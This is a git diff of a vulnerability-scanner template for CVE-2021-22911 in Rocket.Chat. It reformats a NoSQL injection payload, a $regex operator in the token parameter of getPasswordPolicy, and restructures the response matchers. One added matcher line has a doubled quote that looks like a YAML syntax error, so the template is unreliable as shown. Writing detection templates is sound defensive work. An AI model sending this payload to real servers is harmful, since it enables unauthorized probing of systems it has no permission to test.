diff --git a/cves/2022/CVE-2021-22911.yaml b/cves/2022/CVE-2021-22911.yaml index 8d6ce44df3..79d12463b0 100644 --- a/cves/2022/CVE-2021-22911.yaml +++ b/cves/2022/CVE-2021-22911.yaml @@ -27,20 +27,17 @@ requests: Content-Type: application/json Content-Length: 123 - {"message": - "{\"msg\":\"method\", \"method\": \"getPasswordPolicy\", \"params\": [{\"token\": {\"$regex\": \"^6\"}}] }"} + {"message": "{\"msg\":\"method\", \"method\": \"getPasswordPolicy\", \"params\": [{\"token\": {\"$regex\": \"^6\"}}] }"} matchers-condition: and matchers: - type: word part: body words: - - '[error-invalid-user]' - - type: word - part: body - words: - - '"success":true' + - ''[error-invalid-user]' + - '"success":true' + condition: and - type: status status: - - 200 + - 200